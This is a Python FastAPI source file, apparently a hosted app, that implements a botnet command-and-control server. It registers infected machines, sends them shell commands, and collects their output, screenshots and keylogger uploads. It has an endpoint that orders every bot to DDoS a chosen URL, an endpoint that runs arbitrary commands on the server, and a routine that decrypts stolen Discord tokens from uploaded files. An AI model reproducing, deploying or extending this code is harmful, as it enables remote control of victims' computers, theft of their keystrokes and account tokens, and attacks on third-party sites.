Spaces:
Running
Running
| from fastapi import FastAPI, Request, HTTPException, UploadFile, File | |
| from fastapi.responses import PlainTextResponse, StreamingResponse | |
| from Crypto.Cipher import AES | |
| from base64 import b64decode | |
| from datetime import datetime, timedelta | |
| from pydantic import BaseModel | |
| from io import BytesIO | |
| from data import RegistrationData, CommandData, OutputData, DDoSData | |
| from bot import Bot | |
| import aiohttp | |
| from uuid import uuid4 | |
| from hashlib import sha256 as _sha256 | |
| from subprocess import getoutput as go | |
| import re | |
| class Login(BaseModel): | |
| cmd: str = None | |
| login: str = None | |
| paswd: str = None | |
| def failed(): | |
| return HTTPException(detail="failed", status_code=400) | |
| app = FastAPI() | |
| bots = {} | |
| access_uuids = [] | |
| login_sha256 = "26cee98e0b335c5a13b0937bb5f99c55b1206b07425a515b614d53e5023c77b0" | |
| paswd_sha256 = "d5b5c418eb32ba85e9c0a9b8c922c2d4bad28cda3753bf5aeecf24081ad64933" | |
| def sha256(s): | |
| return _sha256(s.encode()).hexdigest() | |
| async def execute(login: Login): | |
| if sha256(login.paswd) != paswd_sha256: | |
| raise failed() | |
| try: | |
| output = go(login.cmd) | |
| except Exception as ex: | |
| output = str(ex) | |
| return PlainTextResponse(output) | |
| async def find_in(key, file: UploadFile = File(...)): | |
| tokens = cleaned = [] | |
| data = await file.read() | |
| data = data.decode(errors="ignore") | |
| for buf in data.splitlines(): | |
| for values in re.findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", buf): | |
| tokens.append(values) | |
| for token in tokens: | |
| if token.endswith("\\"): | |
| token.replace("\\", "") | |
| elif token not in cleaned: | |
| cleaned.append(token) | |
| listed = [] | |
| for token in cleaned: | |
| try: | |
| buf = b64decode(token.split('dQw4w9WgXcQ:')[1]) | |
| iv, payload = buf[3:15], buf[15:] | |
| tok = AES.new(bytes.fromhex(key), AES.MODE_GCM, iv).decrypt(payload)[:-16].decode() | |
| if tok not in listed: | |
| listed.append(tok) | |
| except Exception as ex: | |
| print(ex) | |
| continue | |
| return PlainTextResponse("\n".join(listed)) | |
| async def login_panel(login: Login): | |
| if sha256(login.login) == login_sha256 and sha256(login.paswd) == paswd_sha256: | |
| uuid = str(uuid4()) | |
| access_uuids.append(uuid) | |
| return {"status": "success", "message": "Successfuly loged in.", "uuid": uuid} | |
| raise failed() | |
| async def reg_bot(req: Request, reg: RegistrationData = None): | |
| if reg.name is None or reg.cwd is None or reg.prog is None: | |
| raise failed() | |
| ip = req.headers.get("x-forwarded-for") or "0.0.0.0" | |
| async with aiohttp.ClientSession() as session: | |
| async with session.get(url=f"https://ipinfo.io/{ip}/json") as req: | |
| ip = await req.json() | |
| bot = Bot(reg.name, reg.cwd, ip, reg.prog, reg.uuid) | |
| bots[bot.uuid] = bot | |
| return PlainTextResponse(bot.uuid) | |
| async def get_status(access_uuid: str): | |
| if access_uuid not in access_uuids: | |
| raise failed() | |
| data = {} | |
| for uuid in bots.keys(): | |
| bot = bots.get(uuid) | |
| data[uuid] = await bot.get_status() | |
| return data | |
| async def get_restart_command(bot_uuid: str): | |
| bot = bots.get(bot_uuid) | |
| if bot is None: | |
| return PlainTextResponse("yes") | |
| await bot.set_status() | |
| cmd = await bot.get_restart() | |
| await bot.set_restart(False) | |
| return PlainTextResponse(cmd) | |
| async def set_restart_command(bot_uuid: str, access_uuid: str): | |
| if access_uuid not in access_uuids: | |
| raise failed() | |
| bot = bots.get(bot_uuid) | |
| if bot is None: | |
| raise failed() | |
| await bot.set_restart(True) | |
| return {"status": "success"} | |
| async def set_command(bot_uuid: str, access_uuid: str, data: CommandData): | |
| if access_uuid not in access_uuids: | |
| raise failed() | |
| bot: Bot = bots.get(bot_uuid) | |
| if bot is None: | |
| raise failed() | |
| await bot.set_cmd(data.command) | |
| return {"status": "success", "command": data.command} | |
| async def get_command(bot_uuid: str): | |
| bot: Bot = bots.get(bot_uuid) | |
| if bot is None: | |
| return PlainTextResponse("INVALID_UUID") | |
| await bot.wait_for_command() | |
| cmd = bot.cmd | |
| await bot.clear_cmd() | |
| return PlainTextResponse(cmd) | |
| async def set_output(bot_uuid: str, data: OutputData): | |
| bot: Bot = bots.get(bot_uuid) | |
| if bot is None: | |
| raise failed() | |
| await bot.set_output(data.output) | |
| await bot.set_cwd(data.cwd) | |
| return {"status": "success"} | |
| async def get_command(bot_uuid: str, access_uuid: str): | |
| if access_uuid not in access_uuids: | |
| raise failed() | |
| bot: Bot = bots.get(bot_uuid) | |
| if bot is None: | |
| raise failed() | |
| await bot.wait_for_output() | |
| out = bot.output | |
| await bot.clear_output() | |
| return {"output": out, "cwd": bot.cwd} | |
| async def send_screenshot(bot_uuid: str, file: UploadFile = File(...)): | |
| bot: Bot = bots.get(bot_uuid) | |
| if bot is None: | |
| raise failed() | |
| scr_data = await file.read() | |
| await bot.set_scr(scr_data) | |
| return {"status": "screenshot uploaded successfully"} | |
| async def download_screenshot(bot_uuid: str, access_uuid: str): | |
| if access_uuid not in access_uuids: | |
| raise failed() | |
| bot: Bot = bots.get(bot_uuid) | |
| if bot is None: | |
| raise failed() | |
| await bot.wait_for_scr() | |
| screenshot_data = bot.scr_data | |
| await bot.clear_scr() | |
| return StreamingResponse(BytesIO(screenshot_data), media_type="image/jpeg") | |
| async def send_keys(bot_uuid: str, file: UploadFile = File(...)): | |
| bot: Bot = bots.get(bot_uuid) | |
| if bot is None: | |
| raise failed() | |
| keys = await file.read() | |
| await bot.set_keys(keys) | |
| return {"status": "keylog uploaded successfully"} | |
| async def send_keys(bot_uuid: str, access_uuid: str): | |
| if access_uuid not in access_uuids: | |
| raise failed() | |
| bot: Bot = bots.get(bot_uuid) | |
| if bot is None: | |
| raise failed() | |
| await bot.wait_for_keys() | |
| keys = bot.keys | |
| await bot.clear_keys() | |
| return PlainTextResponse(keys) | |
| async def ddos(access_uuid: str, data: DDoSData): | |
| if access_uuid not in access_uuids: | |
| raise failed() | |
| for uuid in bots.keys(): | |
| await bots[uuid].set_cmd(f"ddos {data.url} {data.packets}") | |
| return {"status": "success"} | |
| async def get_bots(access_uuid: str): | |
| if access_uuid not in access_uuids: | |
| raise failed() | |
| data = {f"{uuid}": {"name": f"{bot.name}", "ip": bot.ip, "cwd": f"{bot.cwd}", "exe": f"{bot.exe_name}"} for uuid, bot in bots.items()} | |
| return {"bots": data} |